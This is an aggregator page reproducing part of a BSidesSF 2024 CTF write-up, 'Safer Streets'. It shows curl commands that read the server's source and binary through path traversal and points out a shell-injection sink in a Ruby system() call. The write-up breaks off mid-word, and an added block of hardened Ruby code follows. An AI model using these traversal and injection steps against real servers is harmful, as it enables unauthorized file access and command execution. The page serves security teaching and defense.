One Article Review

Home - The article:
Source SkullSecurity
Identifier 8504963
Publication date 2024-05-05 19:59:54 (viewed: 2024-05-22 20:06:52)
Title BSidesSF 2024 Writeups: Safer Streets (Web / reversing)
Text This is a write-up for Safer Streets. I apparently wrote this in more “note to self” style, not blog style, so enjoy!

First, browse the application. You should be able to create an error:

    $ curl 'http://localhost:8080/display?name=test'
    Error in script /app/server.rb: No such file or directory @ rb_sysopen - /app/data/test

Note that it has an image/jpeg content-type, so it might confuse the browser. That issue grants access to two primitives:

a) Read any file via path traversal
b) The full path to the server

For example:

    $ curl -s 'http://localhost:8080/display?name=../server.rb' | head -n20
    require 'json'
    require 'sinatra'
    require 'pp'
    require 'singlogger'
    require 'open3'

    ::SingLogger.set_level_from_string(level: ENV['log_level'] || 'debug')
    LOGGER = ::SingLogger.instance()

    # Ideally, we set all these in the Dockerfile
    set :bind, ENV['HOST'] || '0.0.0.0'
    set :port, ENV['PORT'] || '8080'
    SAFER_STREETS_PATH = ENV['SAFER_STREETS'] || '/app/safer-streets'
    SCRIPT = File.expand_path(__FILE__)

    LOGGER.info("Checking for required binaries...")
    if File.exist?(SAFER_STREETS_PATH)
      LOGGER.info("* Found `safer-streets` binary: #{ SAFER_STREETS_PATH }")
    [...]

You can grab the safer-streets binary as well:

    $ curl -s 'http://localhost:8080/display?name=../../../app/safer-streets' | file -
    /dev/stdin: ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=fa512a55e0fbc8c4ad80483379826183f29ce161, for GNU/Linux 3.2.0, with debug_info, not stripped

Inspecting the Ruby code shows a shell-injection issue if you control the output of safer-streets:

    system("/usr/bin/report-infraction --node='#{result['node']}' --img='#{photo}'")

You can reverse or mess with the binary to dis
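The excerpt above shows two defects in the challenge server: the `name` parameter is joined onto `/app/data` without any check, so `../` escapes the directory, and `result['node']` and `photo` are interpolated into a single string handed to `system`, so whatever reaches them is parsed by `/bin/sh`. The following Ruby is an added example, not code from the SkullSecurity write-up or from the challenge's `server.rb`; it shows the hardened form of both patterns. `DATA_DIR`, `NODE_PATTERN`, `safe_data_path` and `report_infraction_argv` are names chosen for this example, and the base directory `/app/data` is assumed from the error message on the page.

```ruby
# Added example (not from the write-up or the challenge's server.rb):
# defensive counterparts to the two primitives described in the excerpt.
require 'pathname'

DATA_DIR = '/app/data'.freeze  # assumed base directory, taken from the error message on the page

# Resolve a user-supplied name under base_dir and refuse anything that escapes it.
# Returns the absolute path as a String, or nil when the name traverses outside
# base_dir (or contains a null byte, which Pathname rejects with ArgumentError).
def safe_data_path(name, base_dir = DATA_DIR)
  base = Pathname.new(base_dir).expand_path
  # Pathname#+ replaces the base when the right-hand side is absolute, and
  # expand_path collapses '..' lexically, so every escape ends up as a path that
  # no longer starts with "#{base}/". (This is a lexical check; if symlinks may
  # live inside base_dir, compare realpath of the result as well.)
  candidate = (base + name.to_s).expand_path
  return nil unless candidate.to_s.start_with?(base.to_s + File::SEPARATOR)
  candidate.to_s
rescue ArgumentError
  nil
end

# Allow-list for node ids: the value came from a parsed binary's output, so treat
# it as untrusted and reject anything outside a conservative character set.
NODE_PATTERN = /\A[A-Za-z0-9_.\-]{1,64}\z/

# Build the report-infraction command as an argv array. Kernel#system called with
# multiple arguments execs the program directly, without /bin/sh, so quotes, ';'
# and $(...) inside node or photo arrive as literal bytes instead of being parsed.
def report_infraction_argv(node, photo)
  raise ArgumentError, 'invalid node id' unless NODE_PATTERN.match?(node.to_s)
  ['/usr/bin/report-infraction', "--node=#{node}", "--img=#{photo}"]
end

# Call site as it would appear in a handler (left commented so this file runs
# without the binary present):
#   system(*report_infraction_argv(result['node'], photo))

if __FILE__ == $PROGRAM_NAME
  p safe_data_path('test')                 # "/app/data/test"
  p safe_data_path('../server.rb')         # nil
  p report_infraction_argv('plate-1', "x.jpg' --img='")
end
```

The two checks are independent: `safe_data_path` closes the read primitive regardless of how the name is encoded, and the argv form of `system` removes the shell from the picture even when `photo` is attacker-influenced, with `NODE_PATTERN` as a second layer on the value parsed out of the binary.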
Rating ★★★★
Sent Yes
Tags Threat Technical


The article does not appear to have been picked up after its publication.


The article does not appear to have been picked up from an earlier one.